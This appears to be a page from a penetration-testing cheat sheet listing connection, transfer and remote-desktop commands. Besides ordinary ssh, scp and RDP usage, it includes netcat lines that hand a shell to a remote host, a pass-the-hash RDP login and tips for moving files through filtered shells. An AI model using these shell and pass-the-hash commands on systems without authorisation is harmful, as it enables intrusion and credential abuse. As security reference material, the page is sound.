Connection

Client

VPN

openvpn <config file>.ovpn
openvpn --config <ovpn file> --auth-user-pass <creds file>    #creds are username and password separated by a line break

SSH

ssh <user>@<ip> -p <port>
ssh <user>@<ip> -i <path to private key>

Create a private key

ssh-keygen -t <rsa/dsa/ecsda> -f <file>
chmod 600 <file>

SCP

Transfer remote file or folder to local

scp <user>@<host>:<filepath> <local path>
scp -i <pkey> <user>@<host>:<filepath> <local path>
scp -r <user>@<host>:<folder> <local path>

Transfer local file or folder to remote

scp <file> <user>@<host>:<path>
scp -i <pkey> <file> <user>@<host>:<filepath>
scp -r <folder> <user>@<host>:<path>

Transfer from remote to remote

scp <user1>@<host1>:<file> <user2>@<host2>:<dest path>

HTTP

curl <url>                 #print html page
curl -v <url> -s           #banner grabbing
curl -i <url>              #banner grabbing
curl -H '<custom header arg i.e. User-Agent: <str>>' <url>

Generic Ports

nc -nCv <ip> <port>        #try with or without -C if console hangs
telnet <ip> <port>         #good luck exiting the terminal without an US keyboard

If the connection is established but we're unable to execute commands try to manually invoke the shell command

nc -e </bin/sh|/bin/bash|cmd.exe> <ip> <port>      
nc -c <sh|bash|cmd.exe> <ip> <port>

File Download

Download

wget <url>                 #download file from HTTP server
wget <url> -O <local path>
wget ftp:\\<url>\<file>    #download file from anonymous ftp server

Download recursive

Useful when executing commands in limited shells\filtered inputs that don't allow "/". All files within the remote server's working folder will be transferred to the target without having to specify the full URLs

wget -r <ip> -nH

File Upload

curl -T <file> http://<url>/         #HTTP PUT
curl -T <file> ftp://<url>/<path>    #FTP
curl -T <file> smtp://<mail server> --mail-from user@example.com
curl -F "files=@<file>" <IP>        #HTTP upload file using JQuery

POST upload

curl -d <param>=<value> -d <param2>=<value2> http://<url>/        #arguments
curl -d '<string or args i.e. admin=admin&pass=pass>' http://url  #string
curl -d @<filename> http://<url>/                                 #file

Server

Require impacketfor python 2/3. See https://github.com/SecureAuthCorp/impacket

HTTP

python -m SimpleHTTPServer <port>

SimpleHttpServerWithFileUploads

FTP

pip3 install pyftpdlib
python3 -m pyftpdlib -p 21

SMB

smbserver.py -smb2support <name> <path to folder>

Remote desktop

rdesktop

rdesktop <ip>
rdesktop <ip> -u <user>@<domain> -p <pass> -g 1024x768
rdesktop <ip> -u <user> -p <pass> -f                    #fullscreen 
rdesktop <ip> -r disk:share=<local folder to share>     #share folder with remote client

xfreerdp

xfreerdp /d:<domain> /u:<user> /v:<host> +clipboard              #share clipboard
xfreerdp /d:<domain> /u:<user> /v:<host> +drives                 #share all mount points
xfreerdp /d:<domain> /u:<user> /v:<host> +home-drive             #share home folder
xfreerdp /d:<domain> /u:<user> /v:<host> /dynamic-resolution     #allow window resize

xfreerdp /u:"<user>" -p:"<password>" /v:<host>
xfreerdp /u:<user> /d:<domain> /p:<password> /v:<ip>:<port>
xfreerdp /u:<user> /pth:<hash> /v:<ip>     #login with hash

xfreerdp /v:<host> /dynamic-resolution +clipboard +home-drive

VNC

vncviewer <ip> 
vncviewer -fullscreen <ip>

Press F8 to use options such as copy between remote and local clipboard, send ctrl+alt+del to remote machine and remove popups

PreviousCron NextCompilers

Last updated 2 years ago